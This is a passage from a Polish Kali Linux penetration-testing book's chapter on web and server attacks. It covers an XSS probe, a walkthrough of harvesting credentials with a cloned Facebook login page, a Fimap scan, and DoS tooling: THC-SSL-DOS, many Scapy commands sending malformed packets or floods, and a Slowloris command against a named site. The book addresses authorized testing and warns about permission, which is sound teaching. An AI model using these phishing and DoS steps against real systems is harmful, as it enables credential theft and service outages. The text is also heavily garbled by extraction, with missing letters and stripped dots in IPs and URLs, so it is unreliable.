ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
